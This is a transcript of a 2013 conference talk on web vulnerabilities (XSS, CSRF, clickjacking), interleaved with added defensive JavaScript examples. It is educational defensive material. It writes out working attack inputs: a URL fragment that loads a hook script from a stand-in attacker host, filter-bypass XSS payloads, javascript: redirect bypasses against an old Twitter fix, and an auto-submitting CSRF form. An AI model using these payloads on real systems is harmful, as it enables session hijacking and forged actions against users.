Three vulnerabilities in web apps (Tre sårbarheter i webbappar)

Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockholm, January 2013.


  1. Three vulnerabilities in web apps. @johnwilander, GeekMeet 2013
  2. All demos are in the FOSS project http://1-liner.org
  3. Three vulnerabilities in web apps:
     • Cross-Site Scripting (XSS)
     • Cross-Site Request Forgery (CSRF)
     • Clickjacking
  4. Over 50 % is XSS. Source: IBM X-Force 2012 Mid-year Trend and Risk Report, September 2012
  5. Cross-Site Scripting: theory
  6. Cross-Site Scripting, type 1: reflected (delivered via phishing)
  7. Cross-Site Scripting, type 2: stored
  9. Cross-Site Scripting, type 0: DOM-based (delivered via phishing)
  10. Cross-Site Scripting, type 0: DOM-based. No request to the server! Single-page apps mean that injected scripts "linger" in the DOM.
  11. https://secure.example.com/authentication#language=sv&country=SE
  12. https://secure.example.com/authentication#language=sv&country=SE. The part after # is never sent to the server. Always be careful about using data from the URL, especially after #.
  13. Would you click on ... https://secure.example.com/authentication#language=<script src="http://attackr.se:3000/hook.js"></script>&country=SE
  14. Would you click on ... https://secure.example.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&country=SE
  15. Would you click on ... http://bit.ly/Yg4T32
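Slides 11 to 15 make the point that anything after # reaches the page's JavaScript without ever passing the server, so the page must validate it itself. The following is an added example, not code from the talk or from the 1-liner project: it reads language and country from a fragment of the form shown on the slides, but maps each value onto an allowlist so that the script payload from slides 13 and 14 (raw or percent-encoded) can never reach the DOM. The allowed language set and the default values are assumptions for the example.

```javascript
// Added example (not from the talk): read language/country from the URL
// fragment, as in the slides' /authentication#language=sv&country=SE URL,
// but treat every value as untrusted input.
// Hypothetical allowlist and defaults; a real app would use its own.
const ALLOWED_LANGUAGES = new Set(["sv", "en", "fi", "no"]);
const COUNTRY_CODE = /^[A-Z]{2}$/;
const DEFAULTS = { language: "en", country: "SE" };

// Parse "#language=sv&country=SE" into a plain object without touching
// the DOM. Keys and values are percent-decoded, so the encoded payload
// from slide 14 decodes to the same <script ...> text as the raw one on
// slide 13. The object has no prototype, so a key such as __proto__ is
// just another string key.
function parseFragment(href) {
  const hashIndex = href.indexOf("#");
  const params = Object.create(null);
  if (hashIndex === -1) return params;
  for (const pair of href.slice(hashIndex + 1).split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? "" : pair.slice(eq + 1);
    try {
      params[decodeURIComponent(rawKey)] = decodeURIComponent(rawVal);
    } catch (e) {
      // malformed percent-encoding: drop this pair rather than guess
    }
  }
  return params;
}

// Map the fragment onto a known-good value set. Anything not on the
// allowlist falls back to a default, so a value like
// '<script src="http://attackr.se:3000/hook.js"></script>' is never
// written to innerHTML or an attribute, however it was encoded.
function settingsFromFragment(href) {
  const p = parseFragment(href);
  const language = ALLOWED_LANGUAGES.has(p.language) ? p.language : DEFAULTS.language;
  const country = COUNTRY_CODE.test(p.country || "") ? p.country : DEFAULTS.country;
  return { language, country };
}
```

In a browser the call would be `settingsFromFragment(window.location.href)`; the returned strings are safe to use anywhere because they can only be one of the allowlisted values or a default, so no encoding decision depends on what the attacker put in the URL.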
  16. Filter out <script>? (Ext.util.Format.stripScripts)
        var ...,
            stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,
        /**
         * Strips all script tags
         * @param {Object} value The text from which to strip script tags
         * @return {String} The stripped text
         */
        stripScripts : function(v) {
            return !v ? v : String(v).replace(stripScriptsRe, "");
        },
      http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
  17. Filter out <script>? Payloads the filter does not catch:
        <img src=1 onerror=alert(1)>
        <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
        <body onload=alert(XSS)>
        <table background="javascript:alert(XSS)">
        ¼script¾alert(¢XSS¢)¼/script¾
        <video poster=javascript:alert(1)//
  18. "Come on, that stuff doesn't work, does it?" It does. Demo.
  19. DOM-based XSS, Twitter, September 2010. Source: http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
  20. (function(g){
        var a = location.href.split("#!")[1];
        if(a) {
          g.location = a;
        }
      })(window);
  21. What does this code do? (same code as slide 20)
  22. "https://twitter.com/#!/johnwilander".split("#!")[1] returns "/johnwilander"
  23. So the code does window.location = "/johnwilander". A leading '/' keeps the domain but changes the path.
  24. So twitter.com/#!/johnwilander becomes twitter.com/johnwilander. Read more: http://kotowicz.net/absolute/
  25. http://twitter.com/#!javascript:alert(document.domain);
  26. http://twitter.com/#!javascript:alert(document.domain); is never sent to the server => DOM-based XSS
  27. The Patch™
        var c = location.href.split("#!")[1];
        if (c) {
          window.location = c.replace(":", "");
        } else {
          return true;
        }
  28. The Patch™: replace(":", "") with a string argument replaces only the first match of the search string.
  29. http://twitter.com/#!javascript::alert(document.domain);
  31. The 2nd Patch™
        (function(g){
          var a = location.href.split("#!")[1];
          if(a) {
            g.location = a.replace(/:/gi,"");
          }
        })(window);
  32. /:/gi: the slashes are the regexp delimiters, g means global matching (every ':' is replaced), i means ignore upper/lower case.
  35. Dooone?
  36. http://twitter.com#!javascript&x58;alert(1)
  37. http://twitter.com#!javascript&x58;alert(1): an HTML entity in place of ':' (as written on the slide)
  38. The n:th Patch™ (this one works)
        (function(g){
          var a = location.href.split("#!")[1];
          if(a) {
            g.location.pathname = a;
          }
        })(window);
      Note that Twitter actually does the right thing: https://twitter.com/about/security
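The lesson of slides 20 to 38 is that stripping characters out of the destination (first one ':', then all of them) never expresses the real requirement, which is "stay on this origin". The following is an added example, not Twitter's code and not from the talk: it performs the same "#!path" redirect, but resolves the fragment with the URL API against the page's own origin and refuses to navigate if the origin would change, which is the check the final patch achieves by assigning to `location.pathname`. The function name and the browser glue at the end are assumptions for the example.

```javascript
// Added example (not Twitter's code or the talk's): resolve the text after
// "#!" relative to the current page and navigate only if the result stays
// on the same origin.

// Returns the absolute URL to navigate to, or null if there is nothing to
// do or the destination would leave the current origin.
function sameOriginRedirect(currentHref) {
  const fragment = currentHref.split("#!")[1];
  if (!fragment) return null;

  const here = new URL(currentHref);
  let target;
  try {
    target = new URL(fragment, here);
  } catch (e) {
    return null; // unparsable destination: do not navigate
  }
  // "javascript:alert(1)" and "javascript::alert(1)" resolve to javascript:
  // URLs, whose origin is "null"; "//attackr.se/x" resolves to
  // https://attackr.se/x. None of them equals the page's origin.
  // "javascript&x58;alert(1)" has no scheme at all, so it becomes a plain
  // path on the current host; the URL API does no HTML entity decoding.
  if (target.origin !== here.origin) return null;
  return target.href;
}

// Browser glue (assumed usage). The talk's final patch assigns the
// fragment to location.pathname, which has the same effect for plain paths.
if (typeof window !== "undefined") {
  const dest = sameOriginRedirect(window.location.href);
  if (dest) window.location.href = dest;
}
```

Comparing `origin` rather than inspecting characters means every scheme-relative, protocol-relative or scheme-carrying form of the destination is handled by the same rule, which is why it does not need a patch per bypass.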
  39. Solve problems like these the right way with client-side encoding
  40. https://github.com/chrisisbeef/jquery-encoder
      • $.encoder.canonicalize(): throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
      • $.encoder.encodeForCSS(): encodes for safe usage in style attribute and style()
      • $.encoder.encodeForHTML(): encodes for safe usage in innerHTML and html()
      • $.encoder.encodeForHTMLAttribute(): encodes for safe usage in HTML attributes
      • $.encoder.encodeForJavaScript(): encodes for safe usage in event handlers etc.
      • $.encoder.encodeForURL(): encodes for safe usage in href etc.
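Slides 16 and 17 show a blacklist (strip `<script>`) and the markup that walks straight past it; slides 39 to 41 give the alternative, encoding for the output context. The following is an added example, not code from the talk, from Ext JS or from jquery-encoder: it runs the slide's `stripScriptsRe` and a small `encodeForHTML` (an assumed implementation of what jquery-encoder's `encodeForHTML` does for an HTML text context) over the payloads from slide 17 and counts how many still contain live markup afterwards. The charset-dependent `¼script¾` payload is left out because its effect depends on how the page is decoded, not on the text itself.

```javascript
// Added example (not from the talk, Ext JS or jquery-encoder).
// The blacklist regex from the Ext.util.Format.stripScripts slide:
const stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig;

function stripScripts(v) {
  return !v ? v : String(v).replace(stripScriptsRe, "");
}

// Encode for an HTML text context: every character that can open a tag or
// an entity, or close an attribute, becomes an entity, so the browser
// renders it as text. Assumed implementation, not jquery-encoder's code.
function encodeForHTML(s) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Payloads from the "filter out <script>?" slide, plus one plain script
// tag that the blacklist does catch (constructed test data).
const PAYLOADS = [
  "<script>alert(1)</script>",
  "<img src=1 onerror=alert(1)>",
  '<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>',
  "<body onload=alert(XSS)>",
  '<table background="javascript:alert(XSS)">',
  "<video poster=javascript:alert(1)//",
];

// Would the HTML parser still see a tag start in this string?
function containsTag(s) {
  return /<[a-zA-Z]/.test(s);
}

// For each approach, count the payloads that still carry live markup.
function compare(payloads = PAYLOADS) {
  return {
    stripped: payloads.filter((p) => containsTag(stripScripts(p))).length,
    encoded: payloads.filter((p) => containsTag(encodeForHTML(p))).length,
  };
}
```

The blacklist neutralises only the one payload it was written for; encoding neutralises all of them without having to know what the attacker wrote, which is why the talk recommends encoding per output context rather than filtering.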
  42. A really nasty one: http://www.aol.com/
  43. Protection against XSS: Content Security Policy http://www.w3.org/TR/CSP/
  44. A new HTTP response header that says: only allow scripts from approved domains, and only allow scripts from files, i.e. no inline scripts.
  45. 'self' = same URL, protocol and port
        Content-Security-Policy: default-src 'self'
      Only load scripts, plugins, CSS, images, audio/video, frames, fonts and data from the site's own domain.
        Content-Security-Policy: default-src 'self'; img-src *; script-src trusted.com
      Accept images from any domain, scripts from trusted.com, and everything else only from the site's own domain.
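To make the two policies on slide 45 concrete, here is an added example, not from the talk or from any browser's code: a simplified model of how a browser decides whether a resource may load under a policy. It handles only what the slide uses ('self', *, bare host names, and the fall-back from a missing directive to default-src) plus the 'unsafe-inline' check behind slide 44; nonces, hashes, wildcard subdomains and scheme-only sources are deliberately not modelled. The function names are assumptions for the example.

```javascript
// Added example (not from the talk): a simplified CSP evaluator.

// "default-src 'self'; img-src *; script-src trusted.com"
//   -> { "default-src": ["'self'"], "img-src": ["*"], "script-src": ["trusted.com"] }
function parsePolicy(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Does one source expression match the resource, for a page at `page`?
function sourceMatches(source, resource, page) {
  if (source === "*") return true;
  if (source === "'none'") return false;
  if (source === "'self'") return resource.origin === page.origin;
  if (source.startsWith("'")) return false; // other keywords not modelled
  // Bare host (optionally with scheme and port): same scheme as the page
  // or https, and the exact host name. No wildcard subdomains here.
  const host = source.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "").split(":")[0];
  const schemeOk = resource.protocol === page.protocol || resource.protocol === "https:";
  return schemeOk && resource.hostname === host;
}

// May a resource governed by `directive` (e.g. "script-src") load?
// A missing directive falls back to default-src; if that is missing too,
// the browser applies no restriction.
function isAllowed(header, directive, resourceUrl, pageUrl) {
  const policy = parsePolicy(header);
  const sources = policy[directive] || policy["default-src"];
  if (!sources) return true;
  const resource = new URL(resourceUrl);
  const page = new URL(pageUrl);
  return sources.some((s) => sourceMatches(s, resource, page));
}

// Slide 44's second rule: inline scripts run only if the policy says so.
function inlineScriptsAllowed(header) {
  const policy = parsePolicy(header);
  const sources = policy["script-src"] || policy["default-src"];
  return !sources || sources.includes("'unsafe-inline'");
}
```

One consequence worth checking against the model: because `script-src trusted.com` replaces default-src for scripts rather than extending it, the site's own scripts are blocked under the slide's second policy unless 'self' is added to script-src as well.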
  46. CSRF: my favourite!
  47. Cross-Site Request Forgery
  48. Cross-Site Request Forgery (delivered via phishing)
  49. May www.attackr.se load images like this: <img src="https://secure.example.com/logo.png" /> ?
  50. May www.attackr.se load images like this: <img src="https://secure.example.com/authentication#language=sv&country=SE" /> ?
  51. With an img element, www.attackr.se can silently send an HTTP GET to any domain: <img src="https://secure.example.com/authentication#language=sv&country=SE" height=0 width=0 />
  52. "What about HTTP POST, then?"
  53. Mock-up used in the demo: two "What's on your mind?" forms, each with a POST button.
  54. The user types "I love OWASP!" and clicks POST.
  55. The post appears: "John: I love OWASP!"
  56. Back to the empty forms.
  57. The second form contains "I hate OWASP!" and is posted.
  59. The post appears in the user's name: "John: I hate OWASP!"
  60. The attacker's page ("Look at the lol cat!") contains a form targeting the 1-liner app and submits it as soon as the page has loaded:
        <form id="target" method="POST" action="https://1-liner.org/form">
          <input type="text" value="I hate OWASP!" name="oneLiner"/>
          <input type="submit" value="POST"/>
        </form>
        <script type="text/javascript">
          $(document).ready(function() {
            $('#target').submit();
          });
        </script>
      Result on the 1-liner site: "John: I hate OWASP!"
  62. csrfMulti.html loads csrfMulti0.html in an invisible iframe.
  63. csrfMulti0.html loads target0.html in an invisible iframe, waits, then loads csrfMulti1.html.
  64. csrfMulti1.html loads target1.html in an invisible iframe, waits, then loads csrfMulti2.html.
  65. csrfMulti2.html loads target2.html in an invisible iframe, waits, then loads csrfMulti3.html.
  66. csrfMulti3.html loads target3.html: four requests chained from one page, each in its own invisible iframe.
  67. Demo: POST CSRF against REST/JSON
  68. Clickjacking... or Likejacking or Followjacking or ...
  69. Clickjacking demo
  70. X-Frame-Options
      http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx
      http://tools.ietf.org/html/draft-gondrom-frame-options-01
  71. "No page may load me in an iframe" or "only pages on my own domain may load me in an iframe"
  72. X-Frame-Options: DENY
      X-Frame-Options: SAMEORIGIN
      (Coming: X-Frame-Options: ALLOW-FROM [list])
  73. Interested?
      • Join your local OWASP chapter: https://www.owasp.org/index.php/OWASP_Chapter
      • Start following these people on Twitter: @0x6D6172696F @garethheyes @WisecWisec @securityninja @jeremiahg @kkotowicz @webtonull @manicode @securityshell
      • Start hacking yourself – it's fun! Best place to start? Your own sites, of course. Just keep it legal ;)
